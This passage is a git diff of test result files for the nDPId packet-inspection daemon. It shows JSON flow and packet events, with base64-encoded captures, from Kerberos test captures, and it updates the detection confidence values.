+00829{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos-error.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645515964250,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":333,"pkt_l4_len":295,"thread_ts_msec":1645515964250,"pkt":"AAAAAAAAAAwAAAAIgQAH2AgARQABO06GQAA5EXItlJdPt5DHCumGqQBYASfB3GqCARswggEXoQMCAQWiAwIBCqNYMFYwSKEDAgECokEEPzA9oAMCAReiNgQ0tg4LUF+YEEIG9iUDuODnyC2ELm8B5cfw4VQNHqTH6JGB5paR4MQdd1ZJvX+lrEsYdKkZFTAKoQQCAgCVogIEAKSBsDCBraAHAwUAAIEAAKEfMB2gAwIBAaEWMBQbBGhvc3QbDG11cy1uLWNqMDcwOaIRGw9MSU5VWC5TSEVMTC5DT02jJDAioAMCAQKhGzAZGwZrcmJ0Z3QbD0xJTlVYLlNIRUxMLkNPTaURGA8yMDIyMDIyMzA3NDYwM1qmERgPMjAyMjAzMDQwNzQ2MDNapwYCBEeh+pmoGjAYAgEXAgESAgERAgEUAgETAgEQAgEZAgEa"} +00735{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos-error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645515964250,"flow_last_seen":1645515964250,"flow_idle_time":200000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1645515964250,"l3_proto":"ip4","src_ip":"148.151.79.183","dst_ip":"144.199.10.233","src_port":34473,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"linux.shell.com","username":"mus-n-cj0709"}} 
+00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"kerberos-error.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1645515964609,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":148,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":148,"pkt_l4_len":110,"thread_ts_msec":1645515964609,"pkt":"AAAAAAAAAAwAAAAIgQAH2AgARQAAgkf1AABzEX93kMcK6ZSXT7cAWIapAG6BuH5kMGKgAwIBBaEDAgEepBEYDzIwMjIwMjIyMDc0NjA0WqUFAgMOwm2mAwIBNKkRGw9MSU5VWC5TSEVMTC5DT02qJDAioAMCAQKhGzAZGwZrcmJ0Z3QbD0xJTlVYLlNIRUxMLkNPTQ=="} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"kerberos-error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1645515964250,"flow_last_seen":1645515964609,"flow_idle_time":200000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1645515964609,"l3_proto":"ip4","src_ip":"148.151.79.183","dst_ip":"144.199.10.233","src_port":34473,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"kerberos-error.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":389,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1645515964609} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 2/2 +~~ skipped flows.............: 0 +~~ total layer4 data 
length..: 389 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6003135 bytes +~~ total memory freed........: 6003135 bytes +~~ total allocations/frees...: 120878/120878 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 470 chars +~~ json string max len.......: 834 chars +~~ json string avg len.......: 645 chars diff --git a/test/results/kerberos-login.pcap.out b/test/results/kerberos-login.pcap.out index 6c6d9528a..ae6734aac 100644 --- a/test/results/kerberos-login.pcap.out +++ b/test/results/kerberos-login.pcap.out 
@@ -2,72 +2,72 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"kerberos-login.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946716066779} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716066779,"flow_last_seen":946716066779,"flow_idle_time":200000,"flow_min_l4_payload_len":1211,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":1211,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946716066779,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1061,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02075{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946716066779,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1253,"pkt_l4_len":1219,"thread_ts_msec":946716066779,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATXAJUAAIAREnkKAQwCCgUDAQQlAFgEw4XHbIIEtzCCBLOhAwIBBaIDAgEMo4IEMTCCBC0wggQpoQMCAQGiggQgBIIEHG6CBBgwggQUoAMCAQWhAwIBDqIHAwUAAAAAAKOCA2xhggNoMIIDZKADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMsMIIDKKADAgEXoQMCAQKiggMaBIIDFnaHOkbe3Ft95M1wKu8wrnnL2KoXK50Wfms4lwl+7nIzTWt\/TBTBxetLCu0b6OiVj3UpYznp3lazrMq98Qwi3aS0sEdZBoJs+Etqw0r7qbOiqGfIzfY5WW7lW95ehl68DOwN7G\/ctJKk8AVM30BgdXD8tz49IVb5LvH8kWVdyLTL7dDroB1zpLEnsskNCGiPKC2kvI4rVQFX\/skMLVm0vrv\/AnhykPJFywmuBCVaX4ilWguDR\/hhedFfzOYZ0xf7kVQmFePGaBfPtyf2tWMm316XiQ6a0ddMjedbQTEPUEaIPhU11lAXVTRXuGNNrbinzU88d0vpPunmiXEQ46Zb2aBwhA2PddlJfkphuRTiKTMYIcDx\/1mQSbo6IMs5BzF09EwRlqL20WWEy+tJbg8F96jQFX9ZfusZkqo2\/Ymtt2KIXO2vcTHWCJfKNWi2oHePkmjQVNqV44BDHKJhg2yYGzOpsCLcIH9xI3jIsbhcV3lnOJelJiIh\/BOztlBncxQJDGM8Ss5lpzuieNTaBQOQBzYsANr2gDw7i5E2tKUZxxU28uYbVQUK6KZjtJp0woRjxeXkug7EiwanRJ+ruwFN4641BrWk2WV7znZLMnOxd9Ixgq276dbW3uk8XghmBk5iO9uBY9B6bl2XBCrn0zJxWO550J7YNhBLCWnZolKhh691S4S\/sMyb9cBhQt9YOq11SPy9kRuQfEqcmeMSn67AgOzJ8mzxQ8a3rs4hfqkn1jH+UhGi1xla+MUNFmVkVcF\/s3a9sERXKT\/GEeYJDkvNw+esHfCK4jalR0pA558BA3fanPrnNu74qdrmsUgOhPibVBiVBOhTvitLl0hsJU5z6U77MFSX4UMd9nw2kPOVPhabSvF2baihVP5t9x+qShNJPWM56UisG6Ab7JzsId2uQf1lTt49iVnnhmjdWddhTtm47iqqL0nJrz7QZtWxYyMQTTtuJpTJCO76PmTywwSdY3tKlhuq3MxMZlzDeglX6VXTiBXGqdqJOfHm8VsI+LTATS2a9Dxo3ZxAgK9aL5NMKTnSmEBKpJmkgY4wgYugAwIBA6KBgwSBgGCx7fTnQzvvnXnzi9LJ0rtprAMBwPNDorbgvJI4BV8TZb2vtoAMBvn\/H0kv3attbzNMWzuI4cmR96epkzzc9Em+P1ZASZGSdvfOcM7pYzUfVYcU+almrfJGc226OPAiNqdT5WqhctEEk6M\/WBsVhSCIKFwQ0F6xriZzYptSncn2pHIwcKAHAwUAQIAAAKIMGwpERU5ZREMuQ09NoyEwH6ADAgEDoRgwFhsEaG9zdBsOeHAxLmRlbnlkYy5jb
22lERgPMjAzNzA5MTMwMjQ4MDVapwYCBAvCgSioGTAXAgEXAgL\/ewIBgAIBAwIBAQIBGAIC\/3k="} -00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716066779,"flow_last_seen":946716066779,"flow_idle_time":200000,"flow_min_l4_payload_len":1211,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":1211,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946716066779,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1061,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716066779,"flow_last_seen":946716066779,"flow_idle_time":200000,"flow_min_l4_payload_len":1211,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":1211,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946716066779,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1061,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 
02049{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946716066779,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1231,"pkt_l4_len":1197,"thread_ts_msec":946716066779,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATBSNEAAIARylIKBQMBCgEMAgBYBCUErTilbYIEoTCCBJ2gAwIBBaEDAgENowwbCkRFTllEQy5DT02kEDAOoAMCAQGhBzAFGwNkZXOlggN2YYIDcjCCA26gAwIBBaEMGwpERU5ZREMuQ09NoiEwH6ADAgEDoRgwFhsEaG9zdBsOeHAxLmRlbnlkYy5jb22jggM0MIIDMKADAgEXoQMCAQKiggMiBIIDHuY7uI3R2Pi1qv57duWeT0Ll4JC2eeipRWlDXzGRgxhPo3csJRa2MQMEvzJvL1oxFgEdtem8BOT\/6kzWb7SgboArNNrafrLfN3L4u+T5BoaqtTGVUaavU7Q9+PXGs7LiGo2KgTrLE9qt+cY1M0j0lU9Usd0PsdgWrPvRldW08V7yTjSdeZzs7HXYDclL3UFolUFFr74WVDo0szg1GjBgT4ahuEYLpeRAOIRHBEgonmzDUd0zcVyxdV30Swv8Qy7TlCy+IgTffAIgDMpddVkTIcDLIJ0JiNqXn0DDzQxH9Yr6KUuBA5LJQKX9AWJ51fUFncoJO0jvdHuM4wqFCI+NceJYJFEg3jPRYfcYh06asxCP3RLORRET1NKwFvfA77ge9U3WoEX\/ShdLO4UPhPvozA6BR0RN2ix3lCp+CLahYrZrHQFA5otaYGv\/MOocj2u+kceip4rTKvuuni64LltdFoW71saPJDefyBkyq4TXwAzh2sEU9sZEub65ComHjMNsaUUdYvlvEuACNBk6sSJ1uNRy5smw7C2wY4appKGOCP44crFldENLSwWXv5EICjWiLi6VOGhAoFAaoXg00SAzG+cR\/zVCrFc99Jmtbsdr3FokLiS2tBlQzNQigbx5GS6NDINjhOdVpxzVZrdRKPvaf7gsgKxsKzMaHaYAf4KlUlgU1YXC4qKw3e8nGsBExyBocaQbTV5qJ5sMCx+8k8UVGcVDvBPEZ+JKGyWl97A+5oQv3qGBvVaTWQWFjp12ue\/6+Z1yW\/3G2oAs\/mvRArSQ6XMQxCqqflRrg8ByB+isl2ue39Es\/7Xp2QNNolZudB1g86tZGEtlQE10gMSOSETka\/rtr5bMEnNrzIEXR71jB36f3LlIdysQMXsAvDmayk2i7xRPsWOPX8TeRAhxvusm+YwAO3gHOBqoERHXUp7FSwtegA+gG1K1MstH7XbrzDU8+2demlkwll9BjirDx0Dabc6GZmQ7FXTr7\/z+u6H14kdj0b9o2RAWTXwOuUBNLVqGWOCd4P++xwERP8qVc2sFAlXiY84kqVhDZjtqg8mUOqaB9jCB86ADAgEDooHrBIHocOAk\/bIykxmFVuY8onVUzz3TbQpUjpIVkGh3RwudGhk8eZadxEVeX9b8cVUYOAa7jQ51P0iHVewP69h7n62lsV7hoaksBFdS6q+5Ad39W06ORHIykCaNTr1ypMQv23OFrKHoU250yqFUu18TCQYph5jY\/L\/0UQND5rBixb9iOLAPk3Z\/C8J7bJIlTV8arD8uZRGaxhSVbUWv0f9+jTl5QGEQtPFBefjh5a9NhX+VO\/Ce7sihoYBD+6XCD31JszlJqPyIXPE
sJNC4ZKHS5qDVxSfmN3+WvFejiMn\/QZucrbJXOsyF6B\/PtA=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067396,"flow_last_seen":946716067396,"flow_idle_time":200000,"flow_min_l4_payload_len":1223,"flow_max_l4_payload_len":1223,"flow_tot_l4_payload_len":1223,"flow_avg_l4_payload_len":1223,"midstream":0,"thread_ts_msec":946716067396,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1065,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02093{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946716067396,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1265,"pkt_l4_len":1231,"thread_ts_msec":946716067396,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATjAKAAAIAREmIKAQwCCgUDAQQpAFgEzxZdbIIEwzCCBL+hAwIBBaIDAgEMo4IEQDCCBDwwggQ4oQMCAQGiggQvBIIEK26CBCcwggQjoAMCAQWhAwIBDqIHAwUAAAAAAKOCA31hggN5MIIDdaADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggM9MIIDOaADAgEXoQMCAQKiggMrBIIDJ4RwpyphOLnHVkqOX4TTLL\/NUu5uT4ndfXvtKiq11NdLWnrJ\/RkaBODS8WDzyOM7DDP1nd4bhExpZR7pwXGASTRBEAN2odNkmh0jdzKuWtjMKtGp2DVyj42cmc+6QXzFWbsc0ciQP3vX8gzqfjlXBbC1PHZQyiL5U92grWlcO9uxZYpsjFPmNRnvg0nt\/xD\/k\/z4alVwZr0+jgG3JmOMUN8YRvUhkqjEGbONBjsYyGrmE3Ae0sFLvgfCOtnaLCrmhDhfe6BckUxCG82cbCE05wDmkFQMzXxqBoDs+mBuGqcT2zUGCvofrim8qNCpUczCV87ZvFqyfleMqYFe8e74u3mmQ1fcSD61TIWvJhyWnsUWMoWSWuBoII6ZhenvLr4HL+5mHWC72kqVQz9srg6QHIqNzvrQ7DgEM\/9XRH0dV9gOEWIuSthdUZx4CSs\/82\/S+XpSQN0F1uaTpfOixCuhaME3tB6ucfpVxhhgNMKhV2MQ++9ZC3EDiLlTWn4p63bFb72BHZJAt27DvsIEwI3bkwnuFtL4Fk2gSwnnirqglXx1m4xMxxPKkc7ZvgGGVTHW+IDRr1tOhGD17PoVtYxucTrKmfY69Rdv\/9z0bIPLo0VviWdk3sc9k8HjkQfgpwDnWjCD0VKBIIGg9uiFiErVIRTHer77I95UgN9tBSgAokTW7wNSkoBbBu
ZGGNUfm0nSFo9rOK9SplQWLL+O5JKrHS69WKIOLFB87yt324276h29cTgvZcIV36teGUEgKDcfX+k5iTX2Ph5V4lxgR97jmS0ytqJ0+s2djuGYjPQuqqEtnqVJXfNpS3XRcFPedWkvKKv1SNplx7iO7hPF7zt\/2aXT0fpNbqBHcMgWJof+k8D5h2RIfUTFFMuM19MydzZK7SdkK0tdWtwN8y5ShlAyusgKRFz5Z8uWh4fgC8O0CO7X3OIwQWHtE1WIPGgNqkoWQsz5hV5mZIHpBVIFMhCXvcvJflISym1AUJsX9K7DD3lNvPS5ksi8gC0X3jNrfYoqxIoSkg01gi4ZcoJfT2HjYcCNwIx3bgN8W82fdKPJYczHHa8jvqKd\/aSBjDCBiaADAgEXooGBBH\/HpWldNX5jKKjLvfGYHFT0ZakiaMIF9M2fyfBeqTcs6p0k76sFAq5yzenyFaJ0etw2gwIKD+jFWzd\/K9hX5c\/ch5FA4bonO9kqluVDS7YqtQXP\/33gATlhiutrL3dBqmpYh5ethifkqz2FdTCpLULEKaDAUyQEhROWLkaHuux6pG8wbaAHAwUAQIAAAKIMGwpERU5ZREMuQ09Nox4wHKADAgECoRUwExsEY2lmcxsLVlBDLVcySzNFTlSlERgPMjAzNzA5MTMwMjQ4MDVapwYCBAudSMaoGTAXAgEXAgL\/ewIBgAIBAwIBAQIBGAIC\/3k="} -00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067396,"flow_last_seen":946716067396,"flow_idle_time":200000,"flow_min_l4_payload_len":1223,"flow_max_l4_payload_len":1223,"flow_tot_l4_payload_len":1223,"flow_avg_l4_payload_len":1223,"midstream":0,"thread_ts_msec":946716067396,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1065,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 
+00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067396,"flow_last_seen":946716067396,"flow_idle_time":200000,"flow_min_l4_payload_len":1223,"flow_max_l4_payload_len":1223,"flow_tot_l4_payload_len":1223,"flow_avg_l4_payload_len":1223,"midstream":0,"thread_ts_msec":946716067396,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1065,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02052{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946716067396,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1234,"pkt_l4_len":1200,"thread_ts_msec":946716067396,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATESNcAAIARykkKBQMBCgEMAgBYBCkEsGcXbYIEpDCCBKCgAwIBBaEDAgENowwbCkRFTllEQy5DT02kETAPoAMCAQGhCDAGGwR4cDEkpYIDfGGCA3gwggN0oAMCAQWhDBsKREVOWURDLkNPTaIeMBygAwIBAqEVMBMbBGNpZnMbC1ZQQy1XMkszRU5Uo4IDPTCCAzmgAwIBF6EDAgEJooIDKwSCAyftJnERJzVnG2FjBXv2U9MTtX58YaXMNT0ScBgBVqkhN64qGvv84Pf1ObDM+s5\/7xfs69pcxVSNfMpOtnq00ChBKYCg6WQIFdYhy22Ep2Cizn5cKMBVuAG\/NuHsuLJ2DKtQnMUqRPG3wDVMDbOsNcJFD1TqSuL8xvADsNggjK12IANMjIyh+sJrZLgBfLKeKuRLc6CVI5kLNyweATyv5GksOsy8+N6dZWMZjNFFUbBH3kLeZKWKtVmsK6gw6wSERuz\/+3yDPEj+zyGf1EYpgbb2nSIQMwDGNLmrh8J0gvwaTXzBO+HpwgkkK5hqRUU3Gh2LZoSwTJywNoKlB0uioI2dYYgi53kMU6eV7HPsIhwqgnQH\/VjXP+fdL6rY34zV8Ix3FkpUhnvHV7S70+LIJfSlm94LyHD71pBZaJhv2PqAnfgtxoztCauzMJhBBCkSLART0AzGBfUZCBXrOoK3J\/fl6W0KIiuMNaW1CdDLAKootzRrEjIZAxwMkGf5h9U8Cc1biAX43B+rEhcYJlZXCDKP5FkMcwHD2yd1RQbu0aDeJd9ZRMKGfzSjxVnFfOI6nwigXn7HZwncWVOLdSbSDe\/3vkHpqAHkuXxLvShbd7wOAHz6Xp8UCAnjMyxVn5HMLSB3VTHTzdr
DQVV+LSjsUlie7Nr6foLTfH2RZwZH95rqftf6gY+uzgyGO1llMR5ZyQybRjUgaNa8Dx6PRsLt3MydcfnKdmjC1g98Ci82Brt5fpKkvjm+FyIGnihml2edVqypt1tBGPdXRsI3VN2W+\/9Sg3cd1QhUsY0JL00GSAojlMDdD4viHaN3feeU2ekPZNg3MHKcM9XUHGdBDpEH\/DXfDBgYWovFuvMwDZtFLYS4mbZRK5b\/nAmpjQH5HNq5HK6mDcJEL\/KLygzLfHwXh3gvtg+zmtag79pBu0u038AGWTB9pYqfDKf5XiURp3mqCKbx4vRMD+GiJBsjWMtzPFny04eCIGBgCqZh65T+T1d2G0Bt4Db+zCE8XI29i8CzvhaO2A7HO6lu1aTRNF8jHlWdkEbWxO2MjLi\/xIJPW+fKU+EoYXLMxAamgfIwge+gAwIBF6KB5wSB5GGl5Jtrs7Bi5L6fEmLsvrIK1dI4nSOmAlrWIBVE3N0Shv8xGKijDSbUX\/fp936uFQnR41x\/u+U61J43Jj7bbriEo+xbbMfPbVIxcGE2B\/9UEzRGPJBxElU3ARP\/c4wC96Nz6oDy00ed8+zipIxBSWuXCVeF7tjhslAjXGq4glP1AeL9B1SLH83sEBO9baZtQHriwlfEXSKnmRAoLso8++0XpvGg1GAhr9GnPsRdwMoLPXqQYLvKNNn4oQT46yQbYLCa+wXkdaumY8ACbsgGvvtN1vbO+VN5vDO+RkeY4HyXJ7\/mHw=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067473,"flow_last_seen":946716067473,"flow_idle_time":200000,"flow_min_l4_payload_len":1219,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":1219,"flow_avg_l4_payload_len":1219,"midstream":0,"thread_ts_msec":946716067473,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1067,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02087{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946716067473,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1261,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1261,"pkt_l4_len":1227,"thread_ts_msec":946716067473,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATfAKUAAIAREmEKAQwCCgUDAQQrAFgEy\/Q0bIIEvzCCBLuhAwIBBaIDAgEMo4IEMTCCBC0wggQpoQMCAQGiggQgBIIEHG6CBBgwggQUoAMCAQWhAwIBDqIHAwUAAAAAAKOCA2xhggNoMIIDZKADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMsMIIDKKADAgEXoQMCAQKiggMaBIIDFnaHOkbe3Ft95M1wKu8wrnnL2KoXK50Wfms4lwl+7nIzTWt\/TBTBxetLCu0b6OiVj3UpYznp3lazrMq98Qwi3aS0sEdZBoJs+Etqw0r7qbOiqGfIzfY5WW7lW95ehl68DOwN7G\/ctJKk8AVM30BgdXD8tz49IVb5LvH8kWVdyLTL7dDroB1zpLEnsskNCGiPKC2kvI4rVQFX\/skMLVm0vrv\/AnhykPJFywmuBCVaX4ilWguDR\/hhedFfzOYZ0xf7kVQmFePGaBfPtyf2tWMm316XiQ6a0ddMjedbQTEPUEaIPhU11lAXVTRXuGNNrbinzU88d0vpPunmiXEQ46Zb2aBwhA2PddlJfkphuRTiKTMYIcDx\/1mQSbo6IMs5BzF09EwRlqL20WWEy+tJbg8F96jQFX9ZfusZkqo2\/Ymtt2KIXO2vcTHWCJfKNWi2oHePkmjQVNqV44BDHKJhg2yYGzOpsCLcIH9xI3jIsbhcV3lnOJelJiIh\/BOztlBncxQJDGM8Ss5lpzuieNTaBQOQBzYsANr2gDw7i5E2tKUZxxU28uYbVQUK6KZjtJp0woRjxeXkug7EiwanRJ+ruwFN4641BrWk2WV7znZLMnOxd9Ixgq276dbW3uk8XghmBk5iO9uBY9B6bl2XBCrn0zJxWO550J7YNhBLCWnZolKhh691S4S\/sMyb9cBhQt9YOq11SPy9kRuQfEqcmeMSn67AgOzJ8mzxQ8a3rs4hfqkn1jH+UhGi1xla+MUNFmVkVcF\/s3a9sERXKT\/GEeYJDkvNw+esHfCK4jalR0pA558BA3fanPrnNu74qdrmsUgOhPibVBiVBOhTvitLl0hsJU5z6U77MFSX4UMd9nw2kPOVPhabSvF2baihVP5t9x+qShNJPWM56UisG6Ab7JzsId2uQf1lTt49iVnnhmjdWddhTtm47iqqL0nJrz7QZtWxYyMQTTtuJpTJCO76PmTywwSdY3tKlhuq3MxMZlzDeglX6VXTiBXGqdqJOfHm8VsI+LTATS2a9Dxo3ZxAgK9aL5NMKTnSmEBKpJmkgY4wgYugAwIBA6KBgwSBgE+CBwcCA3wjmscZf19xzqPpSKLPcLc7F\/pta9XqA44Uly8KztoJtx1T\/S3J5MszKKWl3sa1nSdS6nEargLzVPyFuFPIKFdT8js+0j5l0she3eftmHpSOeDKPNGguEmqAfcNfIiRmNphBpgZxpQSbrNAgDhiogKgyjFF5rfKXwE1pHoweKAHAwUAQIAAAKIMGwpERU5ZREMuQ09NoykwJ6ADAgECoSAwHhsETERBUBsWdnBjLXcyazNlbnQu
ZGVueURDLmNvbaURGA8yMDM3MDkxMzAyNDgwNVqnBgIEC6QO6qgZMBcCARcCAv97AgGAAgEDAgEBAgEYAgL\/eQ=="} -00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067473,"flow_last_seen":946716067473,"flow_idle_time":200000,"flow_min_l4_payload_len":1219,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":1219,"flow_avg_l4_payload_len":1219,"midstream":0,"thread_ts_msec":946716067473,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1067,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067473,"flow_last_seen":946716067473,"flow_idle_time":200000,"flow_min_l4_payload_len":1219,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":1219,"flow_avg_l4_payload_len":1219,"midstream":0,"thread_ts_msec":946716067473,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1067,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": 